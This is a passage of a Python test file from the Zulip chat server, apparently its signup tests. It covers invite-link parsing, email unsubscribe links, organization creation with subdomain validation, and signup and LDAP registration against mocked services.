self.email3 = "email3@zulip.com"
def test_if_emails_separated_by_commas_are_parsed_and_striped_correctly(self):
# type: () -> None
emails_raw = "{} ,{}, {}".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_separated_by_newlines_are_parsed_and_striped_correctly(self):
# type: () -> None
emails_raw = "{}\n {}\n {} ".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_from_email_client_separated_by_newlines_are_parsed_correctly(self):
# type: () -> None
emails_raw = "Email One <{}>\nEmailTwo<{}>\nEmail Three<{}>".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_in_mixed_style_are_parsed_correctly(self):
# type: () -> None
emails_raw = "Email One <{}>,EmailTwo<{}>\n{}".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
class MultiuseInviteTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.realm = get_realm('zulip')
self.realm.invite_required = True
self.realm.save()
def generate_multiuse_invite_link(self, streams=None, date_sent=None):
# type: (List[Stream], Optional[datetime.datetime]) -> Text
invite = MultiuseInvite(realm=self.realm, referred_by=self.example_user("iago"))
invite.save()
if streams is not None:
invite.streams = streams
invite.save()
if date_sent is None:
date_sent = timezone_now()
key = generate_key()
Confirmation.objects.create(content_object=invite, date_sent=date_sent,
confirmation_key=key, type=Confirmation.MULTIUSE_INVITE)
return confirmation_url(key, self.realm.host, Confirmation.MULTIUSE_INVITE)
def check_user_able_to_register(self, email, invite_link):
# type: (Text, Text) -> None
password = "password"
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
from django.core.mail import outbox
outbox.pop()
def check_user_subscribed_only_to_streams(self, user_name, streams):
# type: (str, List[Stream]) -> None
sorted(streams, key=lambda x: x.name)
subscribed_streams = gather_subscriptions(self.nonreg_user(user_name))[0]
self.assertEqual(len(subscribed_streams), len(streams))
for x, y in zip(subscribed_streams, streams):
self.assertEqual(x["name"], y.name)
def test_valid_multiuse_link(self):
# type: () -> None
email1 = self.nonreg_email("test")
email2 = self.nonreg_email("test1")
email3 = self.nonreg_email("alice")
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS - 1)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
self.check_user_able_to_register(email1, invite_link)
self.check_user_able_to_register(email2, invite_link)
self.check_user_able_to_register(email3, invite_link)
def test_expired_multiuse_link(self):
# type: () -> None
email = self.nonreg_email('newuser')
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link has expired.", result)
def test_invalid_multiuse_link(self):
# type: () -> None
email = self.nonreg_email('newuser')
invite_link = "/join/invalid_key/"
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link is malformed.", result)
def test_invalid_multiuse_link_in_open_realm(self):
# type: () -> None
self.realm.invite_required = False
self.realm.save()
email = self.nonreg_email('newuser')
invite_link = "/join/invalid_key/"
with patch('zerver.views.registration.get_realm_from_request', return_value=self.realm):
with patch('zerver.views.registration.get_realm', return_value=self.realm):
self.check_user_able_to_register(email, invite_link)
def test_multiuse_link_with_specified_streams(self):
# type: () -> None
name1 = "newuser"
name2 = "bob"
email1 = self.nonreg_email(name1)
email2 = self.nonreg_email(name2)
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email1, invite_link)
self.check_user_subscribed_only_to_streams(name1, streams)
stream_names = ["Rome", "Verona"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email2, invite_link)
self.check_user_subscribed_only_to_streams(name2, streams)
class EmailUnsubscribeTests(ZulipTestCase):
def test_error_unsubscribe(self):
# type: () -> None
# An invalid insubscribe token "test123" produces an error.
result = self.client_get('/accounts/unsubscribe/missed_messages/test123')
self.assert_in_response('Unknown email unsubscribe request', result)
# An unknown message type "fake" produces an error.
user_profile = self.example_user('hamlet')
unsubscribe_link = one_click_unsubscribe_link(user_profile, "fake")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assert_in_response('Unknown email unsubscribe request', result)
def test_missedmessage_unsubscribe(self):
# type: () -> None
"""
We provide one-click unsubscribe links in missed message
e-mails that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user('hamlet')
user_profile.enable_offline_email_notifications = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile,
"missed_messages")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_offline_email_notifications)
def test_welcome_unsubscribe(self):
# type: () -> None
"""
We provide one-click unsubscribe links in welcome e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user('hamlet')
# Simulate a new user signing up, which enqueues 2 welcome e-mails.
enqueue_welcome_emails(user_profile)
self.assertEqual(2, ScheduledEmail.objects.filter(user=user_profile).count())
# Simulate unsubscribing from the welcome e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "welcome")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The welcome email jobs are no longer scheduled.
self.assertEqual(result.status_code, 200)
self.assertEqual(0, ScheduledEmail.objects.filter(user=user_profile).count())
def test_digest_unsubscribe(self):
# type: () -> None
"""
We provide one-click unsubscribe links in digest e-mails that you can
click even when logged out to stop receiving them.
Unsubscribing from these emails also dequeues any digest email jobs that
have been queued.
"""
user_profile = self.example_user('hamlet')
self.assertTrue(user_profile.enable_digest_emails)
# Enqueue a fake digest email.
context = {'name': '', 'realm_uri': '', 'unread_pms': [], 'hot_conversations': [],
'new_users': [], 'new_streams': {'plain': []}, 'unsubscribe_link': ''}
send_future_email('zerver/emails/digest', to_user_id=user_profile.id, context=context)
self.assertEqual(1, ScheduledEmail.objects.filter(user=user_profile).count())
# Simulate unsubscribing from digest e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "digest")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The setting is toggled off, and scheduled jobs have been removed.
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_digest_emails)
self.assertEqual(0, ScheduledEmail.objects.filter(user=user_profile).count())
class RealmCreationTest(ZulipTestCase):
def test_create_realm(self):
# type: () -> None
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm = get_realm('test')
# Make sure the realm does not exist
self.assertIsNone(realm)
with self.settings(OPEN_REALM_CREATION=True):
# Create new realm with the email
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, realm_subdomain=string_id)
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(string_id)
self.assertIsNotNone(realm)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
# Check defaults
self.assertEqual(realm.org_type, Realm.CORPORATE)
self.assertEqual(realm.restricted_to_domain, False)
self.assertEqual(realm.invite_required, True)
self.assertTrue(result["Location"].endswith("/"))
# Check welcome messages
for stream_name, text, message_count in [
('announce', 'This is', 1),
('core team', 'This is', 1),
('general', 'Welcome to', 1),
('new members', 'stream is', 1),
('zulip', 'Here is', 3)]:
stream = get_stream(stream_name, realm)
recipient = get_recipient(Recipient.STREAM, stream.id)
messages = Message.objects.filter(recipient=recipient).order_by('pub_date')
self.assertEqual(len(messages), message_count)
self.assertIn(text, messages[0].content)
def test_create_realm_existing_email(self):
# type: () -> None
"""
Trying to create a realm with an existing email should just redirect to
a login page.
"""
with self.settings(OPEN_REALM_CREATION=True):
email = self.example_email("hamlet")
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
def test_create_realm_no_creation_key(self):
# type: () -> None
"""
Trying to create a realm without a creation_key should fail when
OPEN_REALM_CREATION is false.
"""
email = "user1@test.com"
realm = get_realm('test')
# Make sure the realm does not exist
self.assertIsNone(realm)
with self.settings(OPEN_REALM_CREATION=False):
# Create new realm with the email, but no creation key.
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response('New organization creation disabled.', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_with_subdomain(self):
# type: () -> None
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
# Make sure the realm does not exist
self.assertIsNone(get_realm('test'))
# Create new realm with the email
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name=realm_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=string_id + ".testserver")
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(string_id)
self.assertIsNotNone(realm)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True)
def test_mailinator_signup(self):
# type: () -> None
result = self.client_post('/create_realm/', {'email': "hi@mailinator.com"})
self.assert_in_response('Please use your real email address.', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions(self):
# type: () -> None
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/create_realm/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
errors = {'id': "length 3 or greater",
'-id': "cannot start or end with a",
'string-ID': "lowercase letters",
'string_id': "lowercase letters",
'stream': "unavailable",
'streams': "unavailable",
'about': "unavailable",
'abouts': "unavailable",
'zephyr': "unavailable"}
for string_id, error_msg in errors.items():
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name = realm_name)
self.assert_in_response(error_msg, result)
# test valid subdomain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'a-0',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://a-0.testserver/accounts/login/subdomain/')
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain(self):
# type: () -> None
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/create_realm/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = '',
realm_name = realm_name)
self.assert_in_response('unavailable', result)
# test valid use of root domain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = '',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://testserver/accounts/login/subdomain/')
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain_option(self):
# type: () -> None
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/create_realm/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'abcdef',
realm_in_root_domain = 'true',
realm_name = realm_name)
self.assert_in_response('unavailable', result)
# test valid use of root domain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'abcdef',
realm_in_root_domain = 'true',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://testserver/accounts/login/subdomain/')
def test_is_root_domain_available(self):
# type: () -> None
self.assertTrue(is_root_domain_available())
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
self.assertFalse(is_root_domain_available())
realm = get_realm("zulip")
realm.string_id = Realm.SUBDOMAIN_FOR_ROOT_DOMAIN
realm.save()
self.assertFalse(is_root_domain_available())
class UserSignUpTest(ZulipTestCase):
def _assert_redirected_to(self, result, url):
# type: (HttpResponse, Text) -> None
self.assertEqual(result.status_code, 302)
self.assertEqual(result['LOCATION'], url)
def test_bad_email_configuration_for_accounts_home(self):
# type: () -> None
"""
Make sure we redirect for SMTP errors.
"""
email = self.nonreg_email('newguy')
smtp_mock = patch(
'zerver.views.registration.send_registration_completion_email',
side_effect=smtplib.SMTPException('uh oh')
)
error_mock = patch('logging.error')
with smtp_mock, error_mock as err:
result = self.client_post('/accounts/home/', {'email': email})
self._assert_redirected_to(result, '/config-error/smtp')
self.assertEqual(
err.call_args_list[0][0][0],
'Error in accounts_home: uh oh'
)
def test_bad_email_configuration_for_create_realm(self):
# type: () -> None
"""
Make sure we redirect for SMTP errors.
"""
email = self.nonreg_email('newguy')
smtp_mock = patch(
'zerver.views.registration.send_registration_completion_email',
side_effect=smtplib.SMTPException('uh oh')
)
error_mock = patch('logging.error')
with smtp_mock, error_mock as err:
result = self.client_post('/create_realm/', {'email': email})
self._assert_redirected_to(result, '/config-error/smtp')
self.assertEqual(
err.call_args_list[0][0][0],
'Error in create_realm: uh oh'
)
def test_user_default_language_and_timezone(self):
# type: () -> None
"""
Check if the default language of new user is the default language
of the realm.
"""
email = self.nonreg_email('newguy')
password = "newpassword"
timezone = "US/Mountain"
realm = get_realm('zulip')
do_set_realm_property(realm, 'default_language', u"de")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, timezone=timezone)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newguy')
self.assertEqual(user_profile.default_language, realm.default_language)
self.assertEqual(user_profile.timezone, timezone)
from django.core.mail import outbox
outbox.pop()
def test_signup_already_active(self):
# type: () -> None
"""
Check if signing up with an active email redirects to a login page.
"""
email = self.example_email("hamlet")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
result = self.client_get(result.url)
self.assert_in_response("You've already registered", result)
def test_signup_invalid_name(self):
# type: () -> None
"""
Check if an invalid name during signup is handled properly.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, full_name="<invalid>")
self.assert_in_success_response(["Invalid characters in name!"], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(['id_password', 'id_full_name'], result)
def test_signup_without_password(self):
# type: () -> None
"""
Check if signing up without a password works properly when
password_auth_enabled is False.
"""
email = self.nonreg_email('newuser')
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
with patch('zerver.views.registration.password_auth_enabled', return_value=False):
result = self.client_post(
'/accounts/register/',
{'full_name': 'New User',
'key': find_key_by_email(email),
'terms': True})
# User should now be logged in.
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newuser')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_signup_without_full_name(self):
# type: () -> None
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'terms': True,
'from_confirmation': '1'})
self.assert_in_success_response(["You're almost there."], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(['id_password', 'id_full_name'], result)
def test_signup_with_full_name(self):
# type: () -> None
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'terms': True,
'full_name': "New Guy",
'from_confirmation': '1'})
self.assert_in_success_response(["You're almost there."], result)
def test_signup_invalid_subdomain(self):
# type: () -> None
"""
Check if attempting to authenticate to the wrong subdomain logs an
error and redirects.
"""
email = "newuser@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
def invalid_subdomain(**kwargs):
# type: (**Any) -> Any
return_data = kwargs.get('return_data', {})
return_data['invalid_subdomain'] = True
with patch('zerver.views.registration.authenticate', side_effect=invalid_subdomain):
with patch('logging.error') as mock_error:
result = self.client_post(
'/accounts/register/',
{'password': password,
'full_name': 'New User',
'key': find_key_by_email(email),
'terms': True})
mock_error.assert_called_once()
self.assertEqual(result.status_code, 302)
def test_failed_signup_due_to_restricted_domain(self):
# type: () -> None
realm = get_realm('zulip')
realm.invite_required = False
realm.save()
request = HostRequestMock(host = realm.host)
request.session = {} # type: ignore
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Your email address, {}, is not in one of the domains".format(email),
form.errors['email'][0])
def test_failed_signup_due_to_invite_required(self):
# type: () -> None
realm = get_realm('zulip')
realm.invite_required = True
realm.save()
request = HostRequestMock(host = realm.host)
request.session = {} # type: ignore
email = 'user@zulip.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Please request an invite for {} from".format(email),
form.errors['email'][0])
def test_failed_signup_due_to_nonexistent_realm(self):
# type: () -> None
request = HostRequestMock(host = 'acme.' + settings.EXTERNAL_HOST)
request.session = {} # type: ignore
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=None)
self.assertIn("organization you are trying to join using {} does "
"not exist".format(email), form.errors['email'][0])
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_from_confirmation(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': ['New LDAP fullname']
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + "(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["You're almost there.",
"New LDAP fullname",
"newuser@zulip.com"],
result)
# Verify that the user is asked for name
self.assert_in_success_response(['id_full_name'], result)
# TODO: Ideally, we wouldn't ask for a password if LDAP is
# enabled, in which case this assert should be invertedq.
self.assert_in_success_response(['id_password'], result)
# Test the TypeError exception handler
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': None # This will raise TypeError
}
}
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["You're almost there.",
"newuser@zulip.com"],
result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_end_to_end(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
full_name = 'New LDAP fullname'
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': [full_name],
'sn': ['shortname'],
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
# Click confirmation link
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Full name should be set from LDAP
self.assert_in_success_response(["You're almost there.",
full_name,
"newuser@zulip.com"],
result)
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(email,
'wrongpassword',
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Didn't create an account
with self.assertRaises(UserProfile.DoesNotExist):
user_profile = UserProfile.objects.get(email=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(email,
password,
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_auto_registration_on_login(self):
# type: () -> None
"""The most common way for LDAP authentication to be used is with a
server that doesn't have a terms-of-service required, in which
case we offer a complete single-sign-on experience (where the
user just enters their LDAP username and password, and their
account is created if it doesn't already exist).
This test verifies that flow.
"""
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
full_name = 'New LDAP fullname'
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': [full_name],
'sn': ['shortname'],
}
}
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
self.login_with_return(email, password,
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_when_names_changes_are_disabled(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': ['New LDAP fullname'],
'sn': ['New LDAP shortname'],
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
# Click confirmation link. This will 'authenticated_full_name'
# session variable which will be used to set the fullname of
# the user.
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
with patch('zerver.views.registration.name_changes_disabled', return_value=True):
result = self.submit_reg_form_for_user(email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# Name comes from LDAP session.
self.assertEqual(user_profile.full_name, 'New LDAP fullname')
def test_registration_when_name_changes_are_disabled(self):
# type: () -> None
"""
Test `name_changes_disabled` when we are not running under LDAP.
"""
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with patch('zerver.views.registration.name_changes_disabled', return_value=True):
result = self.submit_reg_form_for_user(email,
password,
full_name="New Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# 'New Name' comes from POST data; not from LDAP session.
